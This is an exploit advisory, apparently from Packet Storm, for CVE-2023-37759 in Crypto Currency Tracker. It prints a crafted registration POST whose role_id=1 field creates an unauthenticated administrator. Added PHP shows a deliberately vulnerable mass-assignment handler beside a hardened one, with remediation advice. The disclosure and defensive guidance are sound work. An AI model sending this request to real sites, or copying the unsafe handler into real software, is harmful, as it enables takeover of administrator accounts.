CVE-2023-37759: Crypto Currency Tracker (CCT) 9.5 Add Administrator ≈ Packet Storm
Incorrect access control in the User Registration page of Crypto Currency Tracker (CCT) before v9.5 allows unauthenticated attackers to register as an Admin account via a crafted POST request.
# Exploit Title: Crypto Currency Tracker (CCT) - Admin Account Creation (Unauthenticated)
# Date: 11.08.2023
# Exploit Author: 0xBr
# Software Link: https://codecanyon.net/item/crypto-currency-tracker-prices-charts-news-icos-info-and-more/21588008
# Version: <=9.5
# CVE: CVE-2023-37759

POST /en/user/register HTTP/2
Host: localhost
Cookie: XSRF-TOKEN=[TOKEN]; laravel_session=[LARAVEL_SESSION]; SELECTED_CURRENCY=USD; SELECTED_CURRENCY_PRICE=1; cookieconsent_status=dismiss
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 756

_token=[_TOKEN]&name=testing&role_id=1&email=testing%40testing.testing&password=testing&g-recaptcha-response=[G-RECAPTCHA-RESPONSE]&submit_register=Register
Crypto Currency Tracker (CCT) versions 9.5 and below suffer from a flaw that allows an administrative account to be added without authentication.
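The request in the advisory succeeds because the registration handler honours a client-supplied role_id field. The PHP below is an added illustration, not code from CCT or from the advisory author, contrasting that weak pattern with a Laravel controller that validates only the fields a self-registration may set and assigns the role server-side. The model name, the role constants (role_id 1 as administrator follows the advisory's request; 2 as the default user role is assumed) and the redirect target are assumptions for the example.

```php
<?php
// Added example (not CCT's code): a self-registration handler that writes
// whatever the client sends, beside one that fixes the role on the server.
// Assumes a Laravel User model with a role_id column; role ids are assumed.

namespace App\Http\Controllers\Auth;

use App\Models\User;
use Illuminate\Http\Request;
use Illuminate\Routing\Controller;
use Illuminate\Support\Facades\Hash;

class RegisterController extends Controller
{
    private const ROLE_ADMIN = 1; // assumed: matches role_id=1 in the advisory
    private const ROLE_USER  = 2; // assumed: default role for self-registered users

    // Weak pattern: every submitted field, role_id included, reaches the model.
    // A POST carrying role_id=1 therefore creates an administrator.
    public function registerUnsafe(Request $request)
    {
        $user = User::create($request->all());

        return redirect('/');
    }

    // Hardened pattern: validate an explicit allow-list of fields and set the
    // role from a server-side constant, ignoring any role_id the client sent.
    public function register(Request $request)
    {
        $data = $request->validate([
            'name'     => ['required', 'string', 'max:255'],
            'email'    => ['required', 'email', 'max:255', 'unique:users,email'],
            'password' => ['required', 'string', 'min:8'],
        ]);

        $user = new User();
        $user->name     = $data['name'];
        $user->email    = $data['email'];
        $user->password = Hash::make($data['password']);
        $user->role_id  = self::ROLE_USER; // never taken from the request
        $user->save();

        return redirect('/');
    }
}
```

The same rule belongs on the model: role_id should not appear in the Eloquent `$fillable` list, so that even a future `User::create($request->all())` elsewhere in the code base cannot promote an account from request input. Reviewing registration and profile-update routes for privilege fields that are mass-assignable is the quickest way to find this class of flaw in a Laravel application.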